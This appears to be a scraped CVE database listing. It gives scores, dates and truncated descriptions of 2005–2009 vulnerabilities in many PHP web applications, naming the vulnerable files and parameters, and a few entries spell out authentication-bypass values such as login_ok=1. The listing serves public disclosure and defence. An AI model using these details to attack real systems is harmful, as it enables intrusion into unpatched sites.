SQL injection vulnerability in the Search gadget in Jaws 0.6.2 allows remote attackers to execute arbitrary SQL commands via queries with the "LIKE" keyword in the searchdata parameter (search field).
07-03-2011 - 21:38 28-06-2006 - 19:05
CVE-2006-3262 7.5
SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter.
07-03-2011 - 21:38 27-06-2006 - 17:05
CVE-2006-3104 5.0
users/index.php in Bitweaver 1.3 allows remote attackers to obtain sensitive information via an invalid sort_mode parameter, which reveals the installation path and database information in the resultant error message.
07-03-2011 - 21:37 20-06-2006 - 21:02
CVE-2006-3103 4.3
Cross-site scripting (XSS) vulnerability in Bitweaver 1.3 allows remote attackers to inject arbitrary web script or HTML via the (1) error parameter in users/login.php and the (2) feedback parameter in articles/index.php.
07-03-2011 - 21:37 20-06-2006 - 21:02
CVE-2006-3102 5.1
Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period
07-03-2011 - 21:37 20-06-2006 - 21:02
CVE-2006-3065 7.5
SQL injection vulnerability in engine/shards/blog.php in blur6ex 0.3.462 allows remote attackers to execute arbitrary SQL commands via the ID parameter in a proc_reply action in the blog shard. NOTE: This is a similar vulnerability to CVE-2006-1763,
07-03-2011 - 21:37 19-06-2006 - 06:02
CVE-2006-2868 5.1
Multiple PHP remote file inclusion vulnerabilities in Claroline 1.7.6 allow remote attackers to execute arbitrary PHP code via a URL in the includePath cookie to (1) auth/extauth/drivers/mambo.inc.php or (2) auth/extauth/drivers/postnuke.inc.php.
07-03-2011 - 21:37 06-06-2006 - 16:06
CVE-2006-2866 5.1
PHP remote file inclusion vulnerability in layout/prepend.php in DotClear 1.2.4 and earlier allows remote attackers to execute arbitrary PHP code via a FTP URL in the blog_dc_path parameter, which passes file_exists() and is_dir() tests on PHP 5.
07-03-2011 - 21:37 06-06-2006 - 16:06
CVE-2006-2857 7.5
SQL injection vulnerability in index.php in LifeType 1.0.4 allows remote attackers to execute arbitrary SQL commands via the articleId parameter in a ViewArticle action (viewarticleaction.class.php).
07-03-2011 - 21:37 06-06-2006 - 16:06
CVE-2006-2770 5.4
Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, as demonstrated
07-03-2011 - 21:36 02-06-2006 - 06:18
CVE-2006-2743 5.1
Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
07-03-2011 - 21:36 01-06-2006 - 06:02
CVE-2006-2667 7.5
Direct static code injection vulnerability in WordPress 2.0.2 and earlier allows remote attackers to execute arbitrary commands by inserting a carriage return and PHP code when updating a profile, which is appended after a special comment sequence in
07-03-2011 - 21:36 30-05-2006 - 17:02
CVE-2006-2583 5.1
PHP remote file inclusion vulnerability in nucleus/libs/PLUGINADMIN.php in Nucleus 3.22 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[DIR_LIBS] parameter.
07-03-2011 - 21:36 25-05-2006 - 06:02
CVE-2006-2460 6.4
Sugar Suite Open Source (SugarCRM) 4.2 and earlier, when register_globals is enabled, does not protect critical variables such as $_GLOBALS and $_SESSION from modification, which allows remote attackers to conduct attacks such as directory traversal
07-03-2011 - 21:36 19-05-2006 - 06:02
CVE-2006-2459 6.4
SQL injection vulnerability in messages.php in PHP-Fusion 6.00.307 and earlier allows remote authenticated users to execute arbitrary SQL commands via the srch_where parameter.
07-03-2011 - 21:36 19-05-2006 - 06:02
CVE-2006-2405 6.8
Directory traversal vulnerability in unb_lib/abbc.conf.php in Unclassified NewsBoard (UNB) 1.6.1 patch 1 and earlier, when register_globals is enabled, allows remote attackers to include arbitrary files via .. (dot dot) sequences and a trailing null
07-03-2011 - 21:36 16-05-2006 - 06:02
CVE-2006-2331 6.4
Multiple directory traversal vulnerabilities in PHP-Fusion 6.00.306 allow remote attackers to include and execute arbitrary local files via (1) a .. (dot dot) in the settings[locale] parameter in infusions/last_seen_users_panel/last_seen_users_panel.
07-03-2011 - 21:35 11-05-2006 - 20:02
CVE-2006-2330 6.4
PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension
07-03-2011 - 21:35 11-05-2006 - 20:02
CVE-2006-2156 6.4
Directory traversal vulnerability in help/index.php in X7 Chat 2.0 and earlier allows remote attackers to include arbitrary files via .. (dot dot) sequences in the help_file parameter.
07-03-2011 - 21:35 03-05-2006 - 06:02
CVE-2006-2029 6.4
Multiple SQL injection vulnerabilities in Jeremy Ashcraft Simplog 0.9.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) tid parameter in (a) preview.php; the (2) cid, (3) pid, and (4) eid parameters in (b) archive.php
07-03-2011 - 21:34 25-04-2006 - 20:06
CVE-2006-1839 7.5
PHP remote file inclusion vulnerability in language.php in PHP Album 0.3.2.3, when register_globals is enabled, allows remote attackers to execute arbitrary code via an FTP URL in the data_dir parameter, which satisfies the file_exists function call.
07-03-2011 - 21:34 19-04-2006 - 12:06
CVE-2006-1832 5.0
sysinfo.cgi in sysinfo 1.21 allows remote attackers to obtain the installation path via the debugger action.
07-03-2011 - 21:34 19-04-2006 - 12:06
CVE-2006-1831 7.5
Direct static code injection vulnerability in sysinfo.cgi in sysinfo 1.21 and possibly other versions before 2.25 allows remote attackers to execute arbitrary commands via a leading ; (semicolon) in the name parameter in a systemdoc action, which is
07-03-2011 - 21:34 19-04-2006 - 12:06
CVE-2006-1828 5.1
SQL injection vulnerability in php121language.php in PHP121 1.4 allows remote attackers to execute arbitrary SQL commands and execute arbitrary code via the sess_username variable, as set by the php121un HTTP COOKIE parameter, which is used in multip
07-03-2011 - 21:34 19-04-2006 - 12:06
CVE-2006-1784 5.1
PHP remote file inclusion vulnerability in admin/configset.php in Sphider 1.3 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the settings_dir parameter.
07-03-2011 - 21:34 13-04-2006 - 18:02
CVE-2006-1779 6.8
Cross-site scripting (XSS) vulnerability in login.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the btag parameter.
07-03-2011 - 21:34 13-04-2006 - 06:02
CVE-2006-1778 7.5
Multiple SQL injection vulnerabilities in Jeremy Ashcraft Simplog 0.9.2 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) blogid parameter in (a) index.php and (b) archive.php, the (2) m and (3) y parameters in archive.
07-03-2011 - 21:34 13-04-2006 - 06:02
CVE-2006-1777 7.5
Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PH
07-03-2011 - 21:34 13-04-2006 - 06:02
CVE-2006-1776 7.5
PHP remote file inclusion vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the s parameter.
07-03-2011 - 21:34 13-04-2006 - 06:02
CVE-2006-1645 6.8
Cross-site scripting (XSS) vulnerability in Anton Vlasov and Rostislav Gaitkuloff ReloadCMS 1.2.5 and earlier allows remote attackers to inject arbitrary web script or HTML and gain leverage to execute arbitrary PHP code via the User-Agent HTTP heade
07-03-2011 - 21:33 06-04-2006 - 06:04
CVE-2006-1595 4.3
Cross-site scripting (XSS) vulnerability in document/rqmkhtml.php in Claroline 1.7.4 and earlier allows remote attackers to read arbitrary files via ".." sequences in the file parameter in a rqEditHtml command.
07-03-2011 - 21:33 03-04-2006 - 06:04
CVE-2006-1495 7.5
SQL injection vulnerability in general/sendpassword.php in (1) PHPCollab 2.4 and 2.5.rc3, and (2) NetOffice 2.5.3-pl1 and 2.6.0b2 allows remote attackers to execute arbitrary SQL commands via the loginForm parameter in the "forgotten password" option
07-03-2011 - 21:33 29-03-2006 - 19:06
CVE-2006-1480 5.1
Directory traversal vulnerability in start.php in WebAlbum 2.02 allows remote attackers to include arbitrary files and execute commands by (1) injecting code into local log files via GET commands, then (2) accessing that log via a .. (dot dot) sequen
07-03-2011 - 21:33 28-03-2006 - 20:06
CVE-2006-1348 4.3
Cross-site scripting (XSS) vulnerability in index.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang[*][file] parameter, which is injected into an error message. NOTE: this iss
07-03-2011 - 21:32 21-03-2006 - 20:02
CVE-2006-1347 7.5
SQL injection vulnerability in loginfunction.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter.
07-03-2011 - 21:32 21-03-2006 - 20:02
CVE-2006-1346 6.4
Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by i
07-03-2011 - 21:32 21-03-2006 - 20:02
CVE-2006-1292 5.0
Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_lan
07-03-2011 - 21:32 19-03-2006 - 18:02
CVE-2006-1291 7.5
publish.ical.php in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier does not require authentication for write access to the calendars directory, which allows remote attackers to upload and execute arbitrary PHP scripts via a WebDAV PUT request
07-03-2011 - 21:32 19-03-2006 - 18:02
CVE-2006-1243 7.5
Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language para
07-03-2011 - 21:32 15-03-2006 - 12:06
CVE-2006-1219 5.0
Directory traversal vulnerability in Gallery 2.0.3 and earlier, and 2.1 before RC-2a, allows remote attackers to include arbitrary PHP files via ".." (dot dot) sequences in the stepOrder parameter to (1) upgrade/index.php or (2) install/index.php.
07-03-2011 - 21:32 13-03-2006 - 21:02
CVE-2006-1162 5.1
Directory traversal vulnerability in Nodez 4.6.1.1 and earlier allows remote attackers to read or include arbitrary PHP files via a .. (dot dot) in the op parameter, as demonstrated by inserting malicious Email parameters into list.gtdat, then acces
07-03-2011 - 21:32 12-03-2006 - 16:02
CVE-2006-1149 7.5
PHP remote file inclusion vulnerability in lib/OWL_API.php in OWL Intranet Engine 0.82, when register_globals is enabled, allows remote attackers to include arbitrary files via a URL in the xrms_file_root parameter, which is not initialized before us
07-03-2011 - 21:32 10-03-2006 - 06:02
CVE-2006-0899 7.5
Directory traversal vulnerability in index.php in 4Images 1.7.1 and earlier allows remote attackers to read and include arbitrary files via ".." (dot dot) sequences in the template parameter.
07-03-2011 - 21:31 27-02-2006 - 14:06
CVE-2006-0852 7.5
Direct static code injection vulnerability in write.php in Admbook 1.2.2 and earlier allows remote attackers to execute arbitrary PHP code via the X-Forwarded-For HTTP header field, which is inserted into content-data.php.
07-03-2011 - 21:30 22-02-2006 - 21:06
CVE-2006-0714 5.0
Directory traversal vulnerability in the installation file (sql/install-0.9.7.php) in Flyspray 0.9.7 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the adodbpath parameter.
07-03-2011 - 21:30 15-02-2006 - 06:06
CVE-2006-0713 5.0
Directory traversal vulnerability in LinPHA 1.0 allows remote attackers to include arbitrary files via .. (dot dot) sequences in the (1) lang parameter in docs/index.php and the language parameter in (2) install/install.php, (3) install/sec_stage_ins
07-03-2011 - 21:30 15-02-2006 - 06:06
CVE-2006-0687 5.0
process.php in DocMGR 0.54.2 does not initialize the $siteModInfo variable when a direct request is made, which allows remote attackers to include arbitrary local files or possibly remote files via a modified includeModule and siteModInfo variable.
07-03-2011 - 21:30 14-02-2006 - 19:02
CVE-2006-0626 7.5
SQL injection vulnerability in spip_acces_doc.php3 in SPIP 1.8.2g and earlier allows remote attackers to execute arbitrary SQL commands via the file parameter.
07-03-2011 - 21:30 09-02-2006 - 13:06
CVE-2006-0625 6.4
Directory traversal vulnerability in Spip_RSS.PHP in SPIP 1.8.2g and earlier allows remote attackers to read or include arbitrary files via ".." sequences in the GLOBALS[type_urls] parameter, which could then be used to execute arbitrary code via re
07-03-2011 - 21:30 09-02-2006 - 13:06
CVE-2006-0583 7.5
SQL injection vulnerability in mailarticle.php in Clever Copy 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the ID parameter.
07-03-2011 - 21:30 07-02-2006 - 20:02
CVE-2005-4468 7.5
PHP remote file include vulnerability in help_text_vars.php in PHPGedView 3.3.7 and earlier allows remote attackers to execute arbitrary code via a URL in the PGV_BASE_DIRECTORY parameter.
07-03-2011 - 21:28 21-12-2005 - 19:03
CVE-2005-4467 5.0
Directory traversal vulnerability in help_text_vars.php in PHPGedView 3.3.7 and earlier allows remote attackers to read and include arbitrary files via a .. (dot dot) in the PGV_BASE_DIRECTORY parameter.
07-03-2011 - 21:28 21-12-2005 - 19:03
CVE-2005-4319 5.0
Directory traversal vulnerability in index2.php in Limbo CMS 1.0.4.2 and earlier allows remote attackers to include arbitrary PHP files via ".." sequences in the option parameter.
07-03-2011 - 21:27 17-12-2005 - 06:03
CVE-2005-4318 7.5
SQL injection vulnerability in index.php in Limbo CMS 1.0.4.2 and earlier, with register_globals off, allows remote attackers to execute arbitrary SQL commands via the _SERVER[REMOTE_ADDR] parameter, which modifies the underlying $_SERVER variable.
07-03-2011 - 21:27 17-12-2005 - 06:03
CVE-2005-4317 6.8
Limbo CMS 1.0.4.2 and earlier, with register_globals off, does not protect the $_SERVER variable from external modification, which allows remote attackers to use the _SERVER[REMOTE_ADDR] parameter to (1) conduct cross-site scripting (XSS) attacks in
07-03-2011 - 21:27 17-12-2005 - 06:03
CVE-2005-4226 7.5
Multiple "potential" SQL injection vulnerabilities in phpWebThings 1.4 Patched might allow remote attackers to execute arbitrary SQL commands via (1) the ref parameter in download.php, (2) the direction, msg, sforum, reason, subname, and toform param
07-03-2011 - 21:27 14-12-2005 - 06:03
CVE-2005-4213 7.5
SQL injection vulnerability in mod.php in phpCOIN 1.2.2 allows remote attackers to execute arbitrary SQL commands via the phpcoinsessid cookie.
07-03-2011 - 21:27 14-12-2005 - 06:03
CVE-2005-4140 7.5
SQL injection vulnerability in admin/login/index.php in Website Baker 2.6.0 allows remote attackers to execute arbitrary SQL commands via the username parameter, as used by the user field.
07-03-2011 - 21:27 09-12-2005 - 10:03
CVE-2005-4095 5.0
Directory traversal vulnerability in connector.php in the fckeditor2rc2 addon in DoceboLMS 2.0.4 allows remote attackers to list arbitrary files and directories via ".." sequences in the Type parameter in a GetFoldersAndFiles command.
07-03-2011 - 21:27 08-12-2005 - 06:03
CVE-2005-4086 5.0
Directory traversal vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management (SugarCRM) 4.0 beta and earlier allows remote attackers to include arbitrary local files via ".." sequences in the beanFiles array para
07-03-2011 - 21:27 08-12-2005 - 06:03
CVE-2005-3968 7.5
SQL injection vulnerability in auth.inc.php in PHPX 3.5.9 and earlier allows remote attackers to execute arbitrary SQL commands, bypass authentication, and upload arbitrary PHP code via the username parameter.
07-03-2011 - 21:27 03-12-2005 - 14:03
CVE-2005-3929 5.0
Directory traversal vulnerability in the create function in xarMLSXML2PHPBackend.php in Xaraya 1.0 allows remote attackers to create directories and overwrite arbitrary files via ".." sequences in the module parameter to index.php.
07-03-2011 - 21:27 30-11-2005 - 06:03
CVE-2005-3926 7.5
Direct static code injection vulnerability in error.php in GuppY 4.5.9 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via the _SERVER[REMOTE_ADDR] parameter, which is injected into a .inc script
07-03-2011 - 21:27 30-11-2005 - 06:03
CVE-2005-3738 2.6
globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to co
07-03-2011 - 21:27 22-11-2005 - 06:03
CVE-2005-3575 7.5
SQL injection vulnerability in show.php in Cyphor 0.19 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
07-03-2011 - 21:26 16-11-2005 - 02:42
CVE-2005-3324 7.5
SQL injection vulnerability in chat.php in MWChat 6.8 allows remote attackers to execute arbitrary SQL commands via the username parameter.
07-03-2011 - 21:26 27-10-2005 - 06:02
CVE-2006-1371 9.0
Laurentiu Matei eXpandable Home Page (XHP) CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using (1) manager.php, (2) standalonemanager.php, and (3) images.php.
07-03-2011 - 00:00 23-03-2006 - 18:06
CVE-2009-4115 6.5
Multiple static code injection vulnerabilities in the Categories module in CutePHP CuteNews 1.4.6 allow remote authenticated users with application administrative privileges to inject arbitrary PHP code into data/category.db.php via the (1) category
18-01-2011 - 00:00 30-11-2009 - 16:30
CVE-2009-4978 5.0
Directory traversal vulnerability in down.php in MyBackup 1.4.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.
25-08-2010 - 00:00 25-08-2010 - 16:00
CVE-2009-4977 6.5
PHP remote file inclusion vulnerability in index.php in MyBackup 1.4.0 allows remote authenticated users to execute arbitrary PHP code via a URL in the main_content parameter.
25-08-2010 - 00:00 25-08-2010 - 16:00
CVE-2009-4733 6.8
SQL injection vulnerability in checkuser.php in SimpleLoginSys 0.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: some of these details are obtained from third party in
25-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4726 5.0
Directory traversal vulnerability in download.php in Quickdev 4 PHP allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
25-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4722 6.8
SQL injection vulnerability in the CheckLogin function in includes/functions.php in Limny 1.01, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
25-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4732 6.8
SQL injection vulnerability in tt/index.php in TT Web Site Manager 0.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the tt_name parameter. NOTE: some of these details are obtained from third party
23-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4723 7.5
Directory traversal vulnerability in confirm.php in Netpet CMS 1.9 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter.
23-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4754 9.3
Stack-based buffer overflow in Mercury Audio Player 1.21 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file.
21-06-2010 - 00:00 29-03-2010 - 14:30
CVE-2009-4759 9.3
Buffer overflow in BrotherSoft BMXPlay 0.4.4b allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long string in a .BMX file.
08-06-2010 - 00:00 29-03-2010 - 14:30
CVE-2009-4757 9.3
Stack-based buffer overflow in BrotherSoft EW-MusicPlayer 0.8 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: some of these deta
08-06-2010 - 00:00 29-03-2010 - 14:30
CVE-2009-4836 7.5
Eval injection vulnerability in system/services/init.php in Movie PHP Script 2.0 allows remote attackers to execute arbitrary PHP code via the anticode parameter.
11-05-2010 - 00:00 06-05-2010 - 08:47
CVE-2009-4793 6.0
Unrestricted file upload vulnerability in adminpanel/scripts/addphotos.php in BandSite CMS 1.1.4 allows remote authenticated administrators to execute arbitrary PHP code by uploading a file with an executable extension via an addphotos action to admi
23-04-2010 - 00:00 22-04-2010 - 10:30
CVE-2009-4792 7.5
SQL injection vulnerability in includes/content/member_content.php in BandSite CMS 1.1.4 allows remote attackers to execute arbitrary SQL commands via the memid parameter to members.php.
23-04-2010 - 00:00 22-04-2010 - 10:30
CVE-2009-4756 9.3
Stack-based buffer overflow in TraktorBeatport.exe 1.0.0.283 in Beatport Player 1.0.0.0 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file.
30-03-2010 - 10:07 29-03-2010 - 14:30
CVE-2009-3507 7.5
Directory traversal vulnerability in modules.php in CMSphp 0.21 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the mod_file parameter.
08-12-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-4209 4.3
Multiple cross-site scripting (XSS) vulnerabilities in admin/index.php in moziloCMS 1.11.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) file parameters in an editsite action, different vectors than CVE-2008-61
07-12-2009 - 00:00 04-12-2009 - 14:30
CVE-2009-3967 7.5
SQL injection vulnerability in browse.php in Ed Charkow SuperCharged Linking allows remote attackers to execute arbitrary SQL commands via the id parameter.
19-11-2009 - 00:00 18-11-2009 - 18:30
CVE-2009-3716 6.5
Unrestricted file upload vulnerability in admin.php in MCshoutbox 1.1 allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in smilies/.
16-10-2009 - 00:00 16-10-2009 - 12:30
CVE-2009-3715 6.8
Multiple SQL injection vulnerabilities in scr_login.php in MCshoutbox 1.1, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
16-10-2009 - 00:00 16-10-2009 - 12:30
CVE-2009-3714 4.3
Cross-site scripting (XSS) vulnerability in admin_login.php in MCshoutbox 1.1 allows remote attackers to inject arbitrary web script or HTML via the loginerror parameter.
16-10-2009 - 00:00 16-10-2009 - 12:30
CVE-2007-2853 10.0
The VCDAPILibApi ActiveX control in vc9api.DLL 9.0.0.57 in Virtual CD 9.0.0.2 allows remote attackers to execute arbitrary commands via a command line in the first argument to the VCDLaunchAndWait function.
14-10-2009 - 00:59 24-05-2007 - 15:30
CVE-2009-3596 7.5
JoxTechnology Ajox Poll does not properly restrict access to admin/managepoll.php, which allows remote attackers to bypass authentication and gain administrative access via a direct request.
09-10-2009 - 00:00 08-10-2009 - 13:30
CVE-2009-3515 6.5
Directory traversal vulnerability in dnet_admin/index.php in d.net CMS allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the type parameter.
02-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3514 6.5
Multiple SQL injection vulnerabilities in d.net CMS allow remote attackers to execute arbitrary SQL commands via (1) the page parameter to index.php; and allow remote authenticated administrators to execute arbitrary SQL commands via the (2) edit_id
02-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3506 4.3
Multiple cross-site scripting (XSS) vulnerabilities in CMSphp 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) cook_user parameter to index.php and the (2) name parameter to modules.php.
02-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3511 7.5
Multiple PHP remote file inclusion vulnerabilities in justVisual 1.2 allow remote attackers to execute arbitrary PHP code via a URL in the fs_jVroot parameter to (1) sites/site/pages/index.php, (2) sites/test/pages/contact.php, (3) system/pageTemplat
01-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3508 6.0
Multiple directory traversal vulnerabilities in MUJE CMS 1.0.4.34 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) _class parameter to admin.php and the (2) url parameter to install/install.php; and al
01-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3423 6.8
login.php in Zenas PaoLink 1.0, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.
28-09-2009 - 00:00 25-09-2009 - 18:30
CVE-2009-3422 6.8
login.php in Zenas PaoLiber 1.1, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.
28-09-2009 - 00:00 25-09-2009 - 18:30
CVE-2009-3421 6.8
login.php in Zenas PaoBacheca Guestbook 2.1, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.
28-09-2009 - 00:00 25-09-2009 - 18:30
CVE-2009-3217 7.5
SQL injection vulnerability in the admin module in iWiccle 1.01 allows remote attackers to execute arbitrary SQL commands via the member_id parameter in an edit_user action to index.php.
17-09-2009 - 00:00 16-09-2009 - 15:30
CVE-2009-3216 4.3
Multiple directory traversal vulnerabilities in iWiccle 1.01, when magic_quotes_gpc is disabled, allow remote attackers to read arbitrary files via a .. (dot dot) in (1) the show parameter to the admin module, reachable through index.php; or (2) the
17-09-2009 - 00:00 16-09-2009 - 15:30
CVE-2008-4549 2.6
The ImageShack Toolbar ActiveX control (ImageShackToolbar.dll) in ImageShack Toolbar 4.5.7, possibly including 4.5.7.69, allows remote attackers to force the upload of arbitrary image files to the ImageShack site via a file: URI argument to the Build
15-09-2009 - 01:19 14-10-2008 - 14:12
CVE-2008-4547 9.3
Heap-based buffer overflow in the PdvrAtl.PdvrOcx.1 ActiveX control (pdvratl.dll) in DVRHOST Web CMS OCX 1.0.1.25 allows remote attackers to execute arbitrary code via a long second argument to the TimeSpanFormat method.
15-09-2009 - 01:19 14-10-2008 - 14:12
CVE-2009-3158 7.5
admin/files.php in simplePHPWeb 0.2 does not require authentication, which allows remote attackers to perform unspecified administrative actions via unknown vectors. NOTE: some of these details are obtained from third party information.
11-09-2009 - 00:00 10-09-2009 - 14:30
CVE-2009-3148 7.5
Multiple SQL injection vulnerabilities in PortalXP Teacher Edition 1.2 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) calendar.php, (2) news.php, and (3) links.php; and the (4) assignment_id parameter to assignme
10-09-2009 - 00:00 10-09-2009 - 14:30
CVE-2008-7153 7.5
SQL injection vulnerability in the autoDetectRegion function in doceboCore/lib/lib.regset.php in Docebo 3.5.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via the Accept-Language HTTP header. NOTE: this can be leveraged to
02-09-2009 - 00:00 02-09-2009 - 13:30
CVE-2008-3926 5.8
Multiple directory traversal vulnerabilities in Content Management Made Easy (CMME) 1.12 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the env parameter in a weblog action to index.php, or (2) create arbitrary directories v
01-09-2009 - 01:19 04-09-2008 - 14:41
CVE-2008-7058 6.8
Cross-site request forgery (CSRF) vulnerability in BandSite CMS 1.1.4 allows remote attackers to hijack the authentication of administrators and force a logout via adminpanel/logout.php.
29-08-2009 - 01:23 24-08-2009 - 15:30
CVE-2008-7057 4.3
Cross-site scripting (XSS) vulnerability in merchandise.php in BandSite CMS 1.1.4 allows remote attackers to inject arbitrary HTML or web script via the type parameter.
29-08-2009 - 01:23 24-08-2009 - 15:30
CVE-2008-7056 5.0
BandSite CMS 1.1.4 does not perform access control for adminpanel/phpmydump.php, which allows remote attackers to obtain copies of the database via a direct request.
27-08-2009 - 00:00 24-08-2009 - 15:30
CVE-2009-2123 7.5
Multiple SQL injection vulnerabilities in Elvin 1.2.0 allow remote attackers to execute arbitrary SQL commands via the (1) inUser (aka Username) and (2) inPass (aka Password) parameters to (a) inc/login.ei, reachable through login.php; and the (3) id
24-08-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2921 7.5
Multiple SQL injection vulnerabilities in login.php in MOC Designs PHP News 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) newsuser parameter (User field) and (2) newspassword parameter (Password field).
21-08-2009 - 00:00 21-08-2009 - 07:30
CVE-2008-4175 6.5
Multiple SQL injection vulnerabilities in Link Bid Script 1.5 allow remote attackers to execute arbitrary SQL commands via the (1) ucat parameter to upgrade.php and the (2) id parameter to linkadmin/edit.php.
20-08-2009 - 01:20 23-09-2008 - 11:25
CVE-2008-6162 7.5
Bux.to Clone script allows remote attackers to bypass authentication and gain administrative access by setting the loggedin cookie to 1 and the usNick cookie to admin.
19-08-2009 - 01:23 20-02-2009 - 01:46
CVE-2008-6126 5.0
Multiple directory traversal vulnerabilities in moziloCMS 1.10.2 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) file parameter to download.php and the (2) page parameter to index.php, a different vector than
19-08-2009 - 01:23 13-02-2009 - 13:30
CVE-2008-6011 7.5
SQL injection vulnerability in index.php in SG Real Estate Portal 2.0 allows remote attackers to execute arbitrary SQL commands via the page_id parameter.
19-08-2009 - 01:22 30-01-2009 - 13:30
CVE-2008-6010 5.0
Multiple directory traversal vulnerabilities in SG Real Estate Portal 2.0 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) mod, (2) page, or (3) lang parameter to index.php; or the (4) action or (5) folder parameter in a s
19-08-2009 - 01:22 30-01-2009 - 13:30
CVE-2008-4169 7.5
SQL injection vulnerability in detaillist.php in iScripts EasyIndex, possibly 1.0, allows remote attackers to execute arbitrary SQL commands via the produid parameter.
19-08-2009 - 01:19 22-09-2008 - 14:34
CVE-2008-4155 7.8
Multiple directory traversal vulnerabilities in EasySite 2.3 allow remote attackers to read arbitrary files or list directories via a .. (dot dot) in the (1) module or (2) action parameter in (a) www/index.php; the (3) module, (4) ss_module, or (5) s
19-08-2009 - 01:19 19-09-2008 - 19:00
CVE-2008-4115 5.0
TalkBack 2.3.6 allows remote attackers to obtain configuration information via a direct request to install/info.php, which calls the phpinfo function.
19-08-2009 - 01:19 16-09-2008 - 19:00
CVE-2008-7006 5.0
Free PHP VX Guestbook 1.06 allows remote attackers to bypass authentication and download a backup of the database via a direct request to admin/backupdb.php.
19-08-2009 - 00:00 19-08-2009 - 06:30
CVE-2009-2792 7.5
Directory traversal vulnerability in plugings/pagecontent.php in Really Simple CMS (RSCMS) 0.3a allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PT parameter.
18-08-2009 - 00:00 17-08-2009 - 12:30
